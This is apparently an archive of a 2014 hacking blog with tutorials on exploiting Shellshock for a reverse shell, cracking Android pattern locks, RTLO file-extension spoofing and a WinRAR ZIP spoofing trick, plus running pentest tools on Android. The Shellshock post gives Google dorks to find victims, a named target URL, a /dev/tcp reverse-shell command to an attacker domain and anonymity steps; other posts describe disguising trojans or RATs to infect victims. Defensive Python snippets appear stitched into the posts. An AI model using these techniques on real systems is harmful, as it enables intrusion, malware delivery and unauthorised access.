Saturday, 27 September 2014

How to exploit a shellshock vulnerability to get a reverse shell

[image: bash shellshock exploit]

In this tutorial, I will show how to exploit a BASH Shellshock vulnerability successfully and get a reverse shell while keeping ourselves anonymous.

Who is vulnerable to Shellshock?

CGI scripts that use bash variables or commands, and CGI scripts written in bash, can be exploited remotely. Moreover, any service listening on a port that uses bash scripts or bash variables in its code can also be exploited through this vulnerability.
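The reason CGI is exposed is that the web server copies request headers into environment variables for the script, and a vulnerable bash imports any value that starts with "() {" as a function definition and runs what follows. The detection logic below is an added example, not part of the original post: it scans constructed header lines for that signature and pulls out the trailing command so a defender can alert on it.

```python
import re

# Constructed sample: one "Name: value" request header per line, the kind of
# data a CGI host logs or a WAF inspects before the headers become env vars.
SAMPLE_HEADERS = [
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)",
    "User-Agent: () { :;}; /bin/bash -c 'id'",
    "Referer: http://example.com/cgi-bin/status.sh",
    "Cookie: () { ignored; }; echo vulnerable",
    "Accept: text/html",
]

# A Shellshock payload is an exported-function prefix "() { ... }" followed by
# a ";" and a trailing command; spacing between the tokens varies by tool.
# A bare function body without a trailing command is not matched, because
# that is the legitimate bash export format and carries nothing to execute.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{[^}]*\}\s*;")


def extract_command(header_value: str):
    """Return the command appended after the function body, or None."""
    match = SHELLSHOCK_RE.search(header_value)
    if match is None:
        return None
    return header_value[match.end():].strip()


def scan_headers(lines):
    """Return (header name, injected command) for every suspicious line."""
    hits = []
    for line in lines:
        name, _, value = line.partition(":")
        command = extract_command(value)
        if command is not None:
            hits.append((name.strip(), command))
    return hits


if __name__ == "__main__":
    for name, command in scan_headers(SAMPLE_HEADERS):
        print(f"Shellshock attempt in {name}: {command}")
```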

Requirements:

1- Shellshock vulnerable victim
2- Router or USB modem with a port forwarding feature
3- Download exploit for shellshock from here
4- Netcat
5- PHP

Google Dorks:

We can find a vulnerable victim using Google dorks. Most CGI scripts written in bash use a .sh file extension, so the following Google dorks can give you good results.

inurl:/cgi-bin/ ext:sh
inurl:/cgi-bin/ ext:cgi

Vulnerable Victim:

In this tutorial the victim is the following domain:

http://supreme.adisseolabservice.com/cgi-bin/wslb.sh

Port Forwarding:

Open your router or USB modem settings and forward port 4444 to your LAN IP.

noip Domain for anonymity: 

This step is optional; it just provides a little more anonymity in our penetration testing scenario.
1- Visit noip.com and register an account.
2- Now go to your account, then to Manage Hosts. There, add a free domain name pointing to your public IP.
This setting takes almost 1 minute to apply. After one minute you can ping your domain name and verify that it resolves to your public IP. We will use this domain name for our reverse shell.
Here I have registered the domain logon.myftp.org for getting a reverse shell.
So let's perform it.

/dev/tcp Linux Native Reverse Shell:

We will use /dev/tcp for the reverse shell because every Linux system has it.

/bin/bash -i >& /dev/tcp/logon.myftp.org/4444 0>&1

OR

/bin/bash -i >& /dev/tcp/UR_PUBLIC_IP/4444 0>&1

NOTE: forward port 4444 to your LAN IP, otherwise it won't work for you.

Verification of vulnerable victim:

Open CMD and go to the directory where you downloaded the exploit from exploit-db.
Now type the following command to run the exploit:
php bash_mod_cgi_script.php
It will print a usage message asking for a URL and a command.
So use the above URL of the victim and try any Linux system command, e.g. ls, whoami etc.
If you see "command sent to server", it means the server is receiving our command but it can't send back any response.

[image: shellshock vulnerable response]

So, let's try a workaround and get a reverse shell.

Netcat Reverse Shell Handler:

Now we need to run netcat listening on a port so that we can receive a reverse shell. So, start netcat listening on your system with this command:
nc -lp 4444 -vv
-vv is used for verbosity and more information
-l tells netcat to listen
-p sets the custom port on which we want to listen

Now we are all set; just run the following command and wait until you receive a reverse shell on your netcat handler.
php bash_mod_cgi_script.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c "/bin/bash -i >& /dev/tcp/logon.myftp.org/4444 0>&1"

Watch Video Tutorial:

Thursday, 14 August 2014

How To Crack The Android Gesture Pattern Lock

[image: android gesture pattern cracked]

In this tutorial I am going to demonstrate how to crack the gesture pattern of ROOTED Android devices.
This tutorial doesn't seem very effective for attacking some victim, but it is good for those who want to try it on an Android device after getting a Metasploit meterpreter session.

How Does the Gesture Pattern Lock Work?

First of all we need to understand how the gesture pattern works. A pattern is nothing but the path traced by the finger over nine circles, numbered 1 to 9 from the top-left corner to the bottom-right corner as shown in the figure below.

[image: android gesture pattern]

If we select the pattern 1478, it will look like the following figure.

[image: android gesture pattern keys]
The gesture pattern is stored as an unsalted SHA-1 hash in the gesture.key file at /data/system/gesture.key.
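To see why an unsalted hash of such a small keyspace is weak, the added example below (not code from the original post or from the dictionary script it links) reproduces the gesture.key format, SHA-1 over one byte per cell with the on-screen digits 1-9 stored as 0-8, and contrasts it with a hypothetical salted and stretched scheme. The patterns in the lookup table and the salts are constructed values.

```python
import hashlib


def pattern_bytes(pattern: str) -> bytes:
    """Cell bytes as stored in gesture.key: digit 1 -> 0x00 ... digit 9 -> 0x08."""
    if not pattern or any(d not in "123456789" for d in pattern):
        raise ValueError("pattern must be a string of digits 1-9")
    return bytes(int(d) - 1 for d in pattern)


def gesture_key_hash(pattern: str) -> bytes:
    """The weak form described above: plain SHA-1, no salt, no iteration."""
    return hashlib.sha1(pattern_bytes(pattern)).digest()


# Constructed mini "dictionary": hash -> pattern. Because there is no salt,
# this table is built once and works unchanged against every device.
SAMPLE_PATTERNS = ["1478", "14569", "1235789", "2589", "7415"]
UNSALTED_TABLE = {gesture_key_hash(p): p for p in SAMPLE_PATTERNS}


def lookup_unsalted(stored_hash: bytes):
    """Constant-time table hit: identical patterns hash identically everywhere."""
    return UNSALTED_TABLE.get(stored_hash)


def hardened_hash(pattern: str, salt: bytes, iterations: int = 100_000) -> bytes:
    """Hypothetical hardened scheme (not Android's): per-device random salt
    plus PBKDF2 stretching, so a table built for one salt is useless for another."""
    return hashlib.pbkdf2_hmac("sha256", pattern_bytes(pattern), salt, iterations)


def lookup_hardened(stored_hash: bytes, salt: bytes, iterations: int = 100_000):
    """No precomputation possible: every candidate costs a full stretched hash."""
    for candidate in SAMPLE_PATTERNS:
        if hardened_hash(candidate, salt, iterations) == stored_hash:
            return candidate
    return None


if __name__ == "__main__":
    stored = gesture_key_hash("1478")
    print("gesture.key:", stored.hex(), "->", lookup_unsalted(stored))
    salt = b"\x00" * 16  # constructed; a real device would draw this at random
    print("hardened  :", hardened_hash("1478", salt, 1000).hex()[:16], "...")
```

Even the hardened form only multiplies the cost per guess; with under a million possible patterns the stored value still falls to a targeted brute force, which is why pattern verification needs rate limiting or hardware binding rather than just a better hash.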

Tools Required:

1- ADB shell
2- ROOTED android device
3- Gesture pattern SHA-1 dictionary and a script to compare those hashes

1- First of all, enable USB debugging in your mobile's settings and connect your phone to your PC so that we can copy the gesture.key file and recover the pattern from it.

2- Download ADB from the official Android site and extract it on your drive. Open cmd, go to the adb folder and execute the following command.

[image: gesture key copied with adb shell]

3- Now download the gesture pattern SHA-1 dictionary and the Python script from the links given above and extract them on your drive. Then execute the following command.


In the above image you can see the recovered gesture pattern, which is 14569.

NOTE:
This attack hardly takes 1-2 seconds, as the total number of possible patterns is only 985,825.

Monday, 4 August 2014

RTLO/RLO (right to left override) technique for file extension spoofing

[image: RTLO/RLO (right to left override technique)]

Salam everyone..!!
In this tutorial I will show you the RTLO/RLO (right to left override) technique, which is used for file extension spoofing.
This technique is used by many infamous malware families, e.g. GameOverZeus. With this technique you can show your exe file as a pdf, ppt, docx or whatever file extension you want to show to your victim.

Tools needed:

1- unicodeinput freeware utility
2- CFF explorer (to change icon of .NET exe file)

I am using the winmd5 .NET file as a sample exe for demonstration purposes in this tutorial.

Brief intro: 

The RTLO/RLO character (U+202E in Unicode) is designed to support languages that are written right to left, such as Arabic and Hebrew. The problem is that this override character can also be used to make a malicious file look innocuous. An increasing number of email-based attacks take advantage of the RTLO/RLO character to trick users who have been trained to be wary of clicking on random .exe files.
For example, consider the following file name:
“winmd5exe.pdf”
It is encoded with the RTLO/RLO Unicode character. It looks like a PDF document, but in fact it is an exe file in whose name we have placed the Unicode character right after winmd5, i.e. winmd5[RTLO character]fdp.exe. Everything after the RTLO character is read right to left, character by character, so fdp.exe is displayed as exe.pdf (fdp is reversed to pdf).
I hope you got my point. Similarly, you can use the following RTLO file name to run a batch file as a pdf.
"winmd5[RTLO]fdp.bat"

NOTE: The real content type of the file can be viewed from the file properties.

Watch Video Tutorial:

Sunday, 4 May 2014

Winrar File Extension Spoofing 0day

[image: winrar file extension spoofing 0day]

In March 2014, the WinRAR file extension spoofing 0day was used widely to hack many Windows users.
In this tutorial, I will explain this vulnerability with some POC images and a video created by my friend Gujjar-Haxor (Pak Cyber Pirates).

Vulnerability Description:

The file names shown by WinRAR when opening a ZIP file come from the central directory, but the file names used to extract and open contents come from the Local File Header. This inconsistency allows spoofing file names when opening ZIP files with WinRAR, which can be abused to execute arbitrary code.
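Because a well-formed archive carries the same name in both places, the mismatch itself is the indicator. The checker below is an added example, not code from the original post or from WinRAR: it reads every central directory entry with Python's zipfile module, parses the local file header at each entry's offset by hand, and reports any pair that disagrees. The archive it inspects is constructed in memory with a dummy payload, patched exactly as the POC describes (last occurrence of the name, i.e. the central directory, changed from havij.exe to havij.jpg).

```python
import io
import struct
import zipfile

LOCAL_HEADER_SIG = 0x04034B50


def build_sample_zip(spoof: bool) -> bytes:
    """Constructed archive; the 'exe' is a harmless marker string, not a binary."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("havij.exe", b"constructed-sample-not-an-executable")
    data = bytearray(buf.getvalue())
    if spoof:
        # Central directory is written after the local header, so the last
        # occurrence of the name is the one WinRAR displays (per the POC).
        idx = data.rfind(b"havij.exe")
        data[idx:idx + len(b"havij.exe")] = b"havij.jpg"  # same length, no offsets move
    return bytes(data)


def local_header_name(data: bytes, offset: int) -> str:
    """Name stored in the Local File Header that starts at `offset`."""
    (sig,) = struct.unpack_from("<I", data, offset)
    if sig != LOCAL_HEADER_SIG:
        raise ValueError(f"no local file header at offset {offset}")
    (name_len,) = struct.unpack_from("<H", data, offset + 26)  # fixed header is 30 bytes
    return data[offset + 30:offset + 30 + name_len].decode("utf-8", "replace")


def find_name_mismatches(data: bytes):
    """Return (central directory name, local header name) for every disagreement."""
    mismatches = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():  # infolist() is parsed from the central directory
            local = local_header_name(data, info.header_offset)
            if local != info.filename:
                mismatches.append((info.filename, local))
    return mismatches


if __name__ == "__main__":
    for shown, actual in find_name_mismatches(build_sample_zip(spoof=True)):
        print(f"displayed as {shown!r} but extracts as {actual!r}")
```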

NOTE:

This tutorial was found working under Windows 7. For some reason, it didn't work for my friends using Windows 8. So, try it on Win 7 if it doesn't work for you on Win 8. Thanks.

POC:

1- Get a portable executable file. In this tutorial, I am using the Havij software, which is an SQL injection tool, but you can use some trojan or RAT to infect the victim.

2- Right click on this exe file and click on "Add to archive". Choose the ZIP archive format to compress this file into a ZIP archive.

3- Run Hex Editor, Hex Workshop or any hex editor and open this compressed ZIP archive in it. Go to the end of the file, find havij.exe and rename its extension to jpg, like this: havij.jpg.

[image: winrar zip file extension spoofing]


4- Now open this ZIP archive. You will see a havij.jpg icon in the archive. When you double click it, it will run the havij.exe file.
(This is just a demonstration; you can use your own Metasploit payload, trojan or RAT instead of this havij.exe file)

Watch Video Tutorial:


Saturday, 1 February 2014

How To Install Your Favorite Linux Distro And Pentesting Tools Over Android

[image: run linux over android]

Salam everyone, in this tutorial I am going to show you how to install your favorite Linux distro on rooted Android devices.

Note:
The device used for this tutorial is a ROOTED Samsung Galaxy S3

Requirements:

  • Rooted Android Device
  • At least 4GB Disk Space
  • Linux Deploy
  • Wifi Connection

Steps:

1- Download and install Linux Deploy from android market.

2- Run Linux Deploy with superuser permissions and tap the download icon to go to the configuration page.

[image: Linux Deploy configuration page]

3- On the configuration page, choose your favorite distro and its release. Choose a user name. If you don't edit the username field, you will get the default username, which is "android".
Now move to the top of the page and tap the Install option to start the download.

[image: installation of Linux using Linux Deploy]

4- Let the installation complete. On successful installation, you will see the following output.

[image: installation of Linux distro completed in Linux Deploy]

5- Now tap the Start button to start your Linux distro.

[image: Linux running in Linux Deploy]

6- Congrats..!! Now Linux is running in the Linux Deploy console. So, now let's connect to it and test it.

Default Credentials:

Username: android
Password: changeme
Change this password after your first login, since both the SSH and VNC servers accept it.

How to Connect With Deploy Linux:

You can use the following two methods to connect to your Linux Deploy machine.

Connect Using SSH Client:

1- Download any good SSH client to connect to your Linux machine. I am using JuiceSSH here.

2- Use the default credentials given above and connect to localhost. On successful connection, you will see something like the following image.

[image: SSH to Linux Deploy machine using JuiceSSH]

Connect Using VNC Client:

1- Download any good VNC client and connect to the tightvncserver of the Linux Deploy console. I am using bVNC here.

2- Use the default credentials and connect to your VNC server. On successful connection, the output will look like the following image.

[image: bVNC client connected to Linux Deploy]

Penetration Testing Tools:

I have tried the following four tools in this ubuntu-saucy environment and they worked like a charm.

Metasploit Exploitation Framework:

[image: Metasploit over Android]

[image: system exploited using Metasploit on Android]

WPScan (WordPress Vulnerability Scanner):

[image: WPScan WordPress scanner over Android]

Sqlmap (SQL Injection Tool):

[image: sqlmap SQL injection tool over Android]

Nmap (Network Vulnerability Scanner):

[image: Nmap network vulnerability scanner over Android]

Remember me in your prayers and use your knowledge to benefit people.
(exploiter-z)